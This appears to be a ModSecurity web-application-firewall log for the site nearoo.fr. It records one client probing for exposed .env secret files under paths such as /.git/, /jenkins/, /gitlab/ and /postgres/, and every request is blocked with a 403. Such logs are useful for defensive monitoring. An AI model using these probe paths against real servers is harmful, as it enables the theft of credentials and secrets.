[Mon May 11 16:54:48.401230 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdAAAAQI"]
[Mon May 11 16:54:48.401447 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdAAAAQI"]
[Mon May 11 16:54:48.606667 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdQAAAQI"]
[Mon May 11 16:54:48.606904 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdQAAAQI"]
[Mon May 11 16:54:48.607131 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdQAAAQI"]
[Mon May 11 16:54:48.801266 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdgAAAQI"]
[Mon May 11 16:54:48.801469 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdgAAAQI"]
[Mon May 11 16:54:48.801694 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdgAAAQI"]
[Mon May 11 16:54:48.924638 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdwAAAQI"]
[Mon May 11 16:54:48.924854 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdwAAAQI"]
[Mon May 11 16:54:48.925088 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdwAAAQI"]
[Mon May 11 16:54:49.090285 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHeQAAAQI"]
[Mon May 11 16:54:49.090490 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHeQAAAQI"]
[Mon May 11 16:54:49.090723 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHeQAAAQI"]
[Mon May 11 16:54:49.260581 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHegAAAQI"]
[Mon May 11 16:54:49.260812 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHegAAAQI"]
[Mon May 11 16:54:49.261064 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHegAAAQI"]
[Mon May 11 16:54:49.429233 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHewAAAQI"]
[Mon May 11 16:54:49.429444 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHewAAAQI"]
[Mon May 11 16:54:49.429669 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHewAAAQI"]
[Mon May 11 16:54:49.757411 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfAAAAQI"]
[Mon May 11 16:54:49.757633 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfAAAAQI"]
[Mon May 11 16:54:49.757854 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfAAAAQI"]
[Mon May 11 16:54:49.966303 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfQAAAQI"]
[Mon May 11 16:54:49.966523 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfQAAAQI"]
[Mon May 11 16:54:49.966741 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agHtuUWKUxpmnkK7zHyHfQAAAQI"]
[Mon May 11 16:54:50.129113 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfgAAAQI"]
[Mon May 11 16:54:50.129362 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfgAAAQI"]
[Mon May 11 16:54:50.129587 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfgAAAQI"]
[Mon May 11 16:54:50.327019 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfwAAAQI"]
[Mon May 11 16:54:50.327267 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfwAAAQI"]
[Mon May 11 16:54:50.327504 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agHtukWKUxpmnkK7zHyHfwAAAQI"]
[Mon May 11 16:54:50.505356 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgAAAAQI"]
[Mon May 11 16:54:50.505572 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgAAAAQI"]
[Mon May 11 16:54:50.505796 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgAAAAQI"]
[Mon May 11 16:54:50.699968 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agHtukWKUxpmnkK7zHyHggAAAQI"]
[Mon May 11 16:54:50.700128 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agHtukWKUxpmnkK7zHyHggAAAQI"]
[Mon May 11 16:54:50.700359 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agHtukWKUxpmnkK7zHyHggAAAQI"]
[Mon May 11 16:54:50.891483 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgwAAAQI"]
[Mon May 11 16:54:50.891651 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgwAAAQI"]
